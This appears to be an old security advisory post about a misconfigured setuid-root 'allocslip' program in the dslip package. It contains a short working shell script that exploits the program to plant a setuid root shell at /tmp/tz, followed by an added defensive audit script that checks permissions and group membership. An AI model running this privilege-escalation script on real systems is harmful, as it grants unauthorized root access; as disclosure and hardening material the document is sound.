In the README file for the dslip package, it clearly states:

    Those people who are allowed to turn on and off SLIP lines should be put in the slip group. NOBODY except user slip should be allowed in the slipown group since it effectively allows root access (since the dialin/dialout scripts must be run as root).

The package advises to install the program 'allocslip' like so:

-rwsr-x--- 1 root slipown 9220 Aug 4 11:15 allocslip*

If you follow the instructions, then only users in group slipown can run this program and you're only at _their_ mercy. But if you allow anyone to run this program on your machine, and it's setuid root like advised, then something as easy as this will compromise root.

--- cut ---
#!/bin/sh
cat > /tmp/sg << EOF
#!/bin/sh
cp /bin/sh /tmp/tz
chown root /tmp/tz
chmod 4755 /tmp/tz
EOF
chmod +x /tmp/sg
allocslip /tmp/sg
--- eof ---

allocslip simply follows any command you give it as arg 1. So take the above shell script, run it, then look for your handy root shell at /tmp/tz.

The buffer overflow previously mentioned is of no real concern then, since we can already execute whatever we want. And the reason some people can't make this program do exactly what they want (i.e. call system_script() so they can execute whatever they want) is because they must have compiled in the slip option in the networking options of the kernel.

Moral of the story: read the manual. Don't be a dumbshit and install software without reading exactly what you're doing.

-taz
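
An added example, not part of the original post or of the dslip package: a shell audit that checks an allocslip install against the layout the README quoted above describes (owner root, group slipown, mode 4750, nobody but user slip in slipown). The function names are made up for illustration, the path to allocslip is passed in as an argument, and GNU stat is assumed.

```sh
#!/bin/sh
# Added example: audit an allocslip install against the dslip README layout.
# Assumptions: GNU stat; group(5)/passwd(5) file formats; function names are
# illustrative and not part of dslip.

# perm_verdict MODE OWNER GROUP: prints "ok" or why the install is unsafe.
perm_verdict() {
    mode=$1 owner=$2 group=$3
    [ "$owner" = root ] || { echo "owner is $owner, expected root"; return 1; }
    [ "$group" = slipown ] || { echo "group is $group, expected slipown"; return 1; }
    # README layout is -rwsr-x--- (4750). Any "other" bit on a setuid-root
    # allocslip lets every local user run the commands it executes as root.
    case $mode in
        4750) echo ok ;;
        *[1-7]) echo "mode $mode grants access to 'other'"; return 1 ;;
        *) echo "mode $mode differs from 4750"; return 1 ;;
    esac
}

# slipown_extra_members GROUP_FILE PASSWD_FILE: prints every account in
# slipown other than "slip" (supplementary members and primary-gid members).
slipown_extra_members() {
    gfile=$1 pfile=$2
    gid=$(awk -F: '$1 == "slipown" { print $3 }' "$gfile")
    {
        awk -F: '$1 == "slipown" { n = split($4, m, ",")
                 for (i = 1; i <= n; i++) print m[i] }' "$gfile"
        awk -F: -v gid="$gid" 'gid != "" && $4 == gid { print $1 }' "$pfile"
    } | grep -vx -e slip -e '' | sort -u
}

# audit_allocslip PATH [GROUP_FILE] [PASSWD_FILE]: returns 0 only if both pass.
audit_allocslip() {
    bin=$1 gfile=${2:-/etc/group} pfile=${3:-/etc/passwd}
    st=$(stat -c '%a %U %G' "$bin") || return 2
    set -- $st
    rc=0
    verdict=$(perm_verdict "$1" "$2" "$3") || rc=1
    echo "$bin: $verdict"
    extra=$(slipown_extra_members "$gfile" "$pfile")
    [ -z "$extra" ] || { echo "slipown members besides slip:" $extra; rc=1; }
    return $rc
}

# Run only when a path is given, e.g.: sh audit.sh /path/to/allocslip
if [ "$#" -gt 0 ]; then audit_allocslip "$@"; fi
```

The passwd check matters because an account whose primary gid is slipown can run allocslip without ever appearing in the group file's member list.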